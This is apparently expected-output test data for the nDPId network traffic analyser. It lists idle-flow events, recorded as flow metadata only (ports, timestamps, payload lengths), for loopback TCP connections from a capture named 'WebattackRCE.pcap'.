-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 